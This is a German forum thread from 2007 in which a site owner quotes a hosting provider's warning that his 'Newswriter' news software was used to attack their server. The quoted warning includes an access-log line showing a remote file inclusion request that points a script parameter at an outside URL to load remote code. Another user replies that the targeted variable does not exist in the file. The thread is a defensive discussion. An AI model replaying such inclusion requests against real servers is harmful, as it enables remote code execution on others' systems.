Baumstrukturmodus | Linearer Modus

Mad Line · 12.10.2007, 12:40 PM

Moin Moin
Gestern hab ich mal wieder eine mail bekommen von Puretec.

Zitat:wiederum mussten wir einen über Ihre Präenz ausgeführten Angriff auf unseren Webserver registrieren. Erneut war die Software "Newswriter"
Ausgangspunkt, welches das Ausführen beliebigen Codes erlaubt.

Wir möchten Sie nun nochmals bitten sich des Problems anzunehmen und für die Sicherheit der von Ihnen verwendeten Software Sorge zu tragen.

200.126.201.125 - - [11/Oct/2007:07:20:37 +0200] "GET /cgi/newssystem/include/initvars.inc.php?NWCONF_SYSTEM[server_path]=http
://quecagada.bravehost.com/http? HTTP/1.1" 200 15 www.****-****** "Mozilla/3.0 (compatible; Indy Library)" "-"

allso es reicht nicht nur eine umleitung in den zwei dateien werde die umleitung in allen dateien im incude ordner vornehmen.

***basti*** · 14.10.2007, 18:47 PM

Hi,

das ist aber ansich nicht möglich, weil in der initvars.inc.php der Platzhalter $NWCONF_SYSTEM[server_path] gar nicht vor kommt. Also kann der gar nicht aufgerufen bzw. überschrieben werden.

Möglicherweise verwandte Themen...
Thema:		Verfasser	Antworten:	Ansichten:	Letzter Beitrag
	Hacker Angriffe	brummi	2	5,632	04.03.2008 23:25 PM Letzter Beitrag: basti